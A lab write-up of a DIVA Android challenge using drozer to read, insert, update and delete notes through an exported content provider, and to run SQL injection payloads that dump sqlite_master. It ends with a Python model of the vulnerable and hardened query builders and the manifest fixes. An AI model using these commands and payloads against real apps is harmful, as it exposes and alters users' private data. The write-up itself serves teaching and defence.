Test DIVA - content provider exported - DB Based
This challenge is #11, Access Control Issues - Part 3. The goal is to access the stored notes without needing the PIN code.
- Opening move

```
dz> run app.provider.info -a jakhar.aseem.diva
Attempting to run shell module

Package: jakhar.aseem.diva
  Authority: jakhar.aseem.diva.provider.notesprovider
  Read Permission: null
  Write Permission: null
  Content Provider: jakhar.aseem.diva.NotesProvider
  Multiprocess Allowed: False
  Grant Uri Permissions: False
  Uri Permission Patterns:
  Path Permissions:

dz> run scanner.provider.finduris -a jakhar.aseem.diva
Attempting to run shell module
Scanning jakhar.aseem.diva...
No respone from content URI: content://jakhar.aseem.diva.provider.notesprovider/
Got a response from content Uri: content://jakhar.aseem.diva.provider.notesprovider/notes
No respone from content URI: content://jakhar.aseem.diva.provider.notesprovider
Got a response from content Uri: content://jakhar.aseem.diva.provider.notesprovider/notes/
For sure accessible content URIs:
  content://jakhar.aseem.diva.provider.notesprovider/notes
  content://jakhar.aseem.diva.provider.notesprovider/notes/
```
From the test results above we can see the state of jakhar.aseem.diva.NotesProvider (it is reachable with no read or write permission set) and which content URIs it responds to.

- Reversing
From the NotesProvider class we can see that it is the class that manages the notes database and that it implements the query/update/insert/delete functions. So we should be able to send requests to this database the same way we did with Sieve.

- query/insert/update/delete/sqli
- query
We have met the challenge's requirement: a direct query is all it takes.

```
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --vertical
Attempting to run shell module
_id    5
title  Exercise
note   Alternate days running

_id    4
title  Expense
note   Spent too much on home theater

_id    6
title  Weekend
note   b333333333333r

_id    3
title  holiday
note   Either Goa or Amsterdam

_id    2
title  home
note   Buy toys for baby, Order dinner

_id    1
title  office
note   10 Meetings. 5 Calls. Lunch with CEO
```
- insert
```
dz> run app.provider.insert content://jakhar.aseem.diva.provider.notesprovider/notes --integer _id 7 --string title pwn1 --string note pwnpwn1
Attempting to run shell module
Done.

dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes
Attempting to run shell module
| _id | title    | note                                 |
| 5   | Exercise | Alternate days running               |
| 4   | Expense  | Spent too much on home theater       |
| 6   | Weekend  | b333333333333r                       |
| 3   | holiday  | Either Goa or Amsterdam              |
| 2   | home     | Buy toys for baby, Order dinner      |
| 1   | office   | 10 Meetings. 5 Calls. Lunch with CEO |
| 7   | pwn1     | pwnpwn1                              |
```
- update
```
dz> run app.provider.update content://jakhar.aseem.diva.provider.notesprovider/notes --selection "_id=?" --selection-args 7 --string title pwn2 --string note pwnpwn2
Attempting to run shell module
Done.

dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes
Attempting to run shell module
| _id | title    | note                                 |
| 5   | Exercise | Alternate days running               |
| 4   | Expense  | Spent too much on home theater       |
| 6   | Weekend  | b333333333333r                       |
| 3   | holiday  | Either Goa or Amsterdam              |
| 2   | home     | Buy toys for baby, Order dinner      |
| 1   | office   | 10 Meetings. 5 Calls. Lunch with CEO |
| 7   | pwn2     | pwnpwn2                              |
```
- delete
```
dz> run app.provider.delete content://jakhar.aseem.diva.provider.notesprovider/notes --selection "_id=?" --selection-args 7
Attempting to run shell module
Done.

dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes
Attempting to run shell module
| _id | title    | note                                 |
| 5   | Exercise | Alternate days running               |
| 4   | Expense  | Spent too much on home theater       |
| 6   | Weekend  | b333333333333r                       |
| 3   | holiday  | Either Goa or Amsterdam              |
| 2   | home     | Buy toys for baby, Order dinner      |
| 1   | office   | 10 Meetings. 5 Calls. Lunch with CEO |
```
- sqli
The test payloads are shown below. There is indeed a SQL injection vulnerability, and the full list of tables can be read out through it.

```
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --selection "'"
Attempting to run shell module
Exception occured: unrecognized token: "') ORDER BY title" (code 1 SQLITE_ERROR): , while compiling: SELECT * FROM notes WHERE (') ORDER BY title

dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "* FROM SQLITE_MASTER WHERE type='table';--"
Attempting to run shell module
| type  | name             | tbl_name         | rootpage | sql                                                                                              |
| table | android_metadata | android_metadata | 3        | CREATE TABLE android_metadata (locale TEXT)                                                      |
| table | notes            | notes            | 4        | CREATE TABLE notes (_id INTEGER PRIMARY KEY AUTOINCREMENT, title TEXT NOT NULL, note TEXT NOT NULL) |
| table | sqlite_sequence  | sqlite_sequence  | 5        | CREATE TABLE sqlite_sequence(name,seq)                                                           |
```
drozer can also locate the likely injection points automatically.

```
dz> run scanner.provider.injection -a jakhar.aseem.diva
Attempting to run shell module
Scanning jakhar.aseem.diva...
Not Vulnerable:
  content://jakhar.aseem.diva.provider.notesprovider/
  content://jakhar.aseem.diva.provider.notesprovider

Injection in Projection:
  content://jakhar.aseem.diva.provider.notesprovider/notes/
  content://jakhar.aseem.diva.provider.notesprovider/notes

Injection in Selection:
  content://jakhar.aseem.diva.provider.notesprovider/notes/
  content://jakhar.aseem.diva.provider.notesprovider/notes

dz> run scanner.provider.sqltables -a jakhar.aseem.diva
Attempting to run shell module
Scanning jakhar.aseem.diva...
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
  android_metadata
  notes
  sqlite_sequence

Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes:
  android_metadata
  notes
  sqlite_sequence
```
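To make the failure mode concrete from the defender's side, here is an added Python model of the two ways a provider can build its query. This is not DIVA's code and not drozer's. The shape of the SQL, `SELECT <projection> FROM notes WHERE (<selection>) ORDER BY title`, is taken from the error message drozer got back above, and the notes schema comes from the sqlite_master dump; the sample rows, the in-memory database and the function names (`vulnerable_query`, `hardened_query`, `demo`) are constructed for this example. The vulnerable builder reproduces both results seen above (the syntax error from a lone quote and the sqlite_master rows from the projection payload), while the hardened builder allowlists column names and binds values, so the same inputs are rejected.

```python
import sqlite3

# Column names of the real notes table, taken from the CREATE TABLE statement
# in the sqlite_master dump above. The rows below are constructed sample data.
NOTE_COLUMNS = ("_id", "title", "note")
SAMPLE_NOTES = [
    (1, "office", "10 Meetings. 5 Calls. Lunch with CEO"),
    (2, "home", "Buy toys for baby, Order dinner"),
]


def open_db():
    """In-memory SQLite database shaped like the DIVA notes database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE android_metadata (locale TEXT)")
    # AUTOINCREMENT makes SQLite create sqlite_sequence as well, matching the dump.
    conn.execute("CREATE TABLE notes (_id INTEGER PRIMARY KEY AUTOINCREMENT, "
                 "title TEXT NOT NULL, note TEXT NOT NULL)")
    conn.executemany("INSERT INTO notes VALUES (?, ?, ?)", SAMPLE_NOTES)
    return conn


def vulnerable_query(conn, projection, selection=None, selection_args=()):
    """Model of a provider that splices caller-controlled projection and
    selection strings straight into the SQL text. The resulting statement has
    the same shape as the one in drozer's error message above."""
    cols = ", ".join(projection) if projection else "*"
    sql = f"SELECT {cols} FROM notes"
    if selection:
        sql += f" WHERE ({selection})"
    sql += " ORDER BY title"
    return conn.execute(sql, selection_args).fetchall()


def hardened_query(conn, projection, selection=None):
    """Every column name is checked against an allowlist, and the selection is
    a dict of column -> value so values are bound, never parsed as SQL."""
    cols = tuple(projection) if projection else NOTE_COLUMNS
    for col in cols:
        if col not in NOTE_COLUMNS:
            raise ValueError(f"unknown column in projection: {col!r}")
    sql = f"SELECT {', '.join(cols)} FROM notes"
    args = []
    if selection:
        clauses = []
        for col, value in selection.items():
            if col not in NOTE_COLUMNS:
                raise ValueError(f"unknown column in selection: {col!r}")
            clauses.append(f"{col} = ?")
            args.append(value)
        sql += " WHERE " + " AND ".join(clauses)
    sql += " ORDER BY title"
    return conn.execute(sql, args).fetchall()


def demo():
    """Replay the two inputs from the write-up against both builders."""
    conn = open_db()
    # The projection payload from the page: the trailing "--" comments out
    # " FROM notes ORDER BY title", so sqlite_master is read instead of notes.
    injected_projection = ["* FROM sqlite_master WHERE type='table';--"]
    leaked = vulnerable_query(conn, injected_projection)

    # A lone quote breaks the statement, which is the SQLITE_ERROR drozer showed.
    try:
        vulnerable_query(conn, ["*"], "'")
        quote_error = False
    except sqlite3.OperationalError:
        quote_error = True

    # The hardened builder refuses the payload before it reaches SQLite.
    try:
        hardened_query(conn, injected_projection)
        blocked = False
    except ValueError:
        blocked = True

    return {
        "leaked_tables": sorted(row[1] for row in leaked),  # name column of sqlite_master
        "quote_error": quote_error,
        "blocked": blocked,
    }


if __name__ == "__main__":
    print(demo())
    print(hardened_query(open_db(), ["title"], {"_id": 1}))
```

The allowlist plus bound values is the same idea the Android platform offers through `SQLiteQueryBuilder.setProjectionMap()` and `setStrict(true)`. Independently of the injection, the access-control fix for this challenge lives in the manifest: a provider that other apps should not reach gets `android:exported="false"`, or a `readPermission`/`writePermission` that callers must hold.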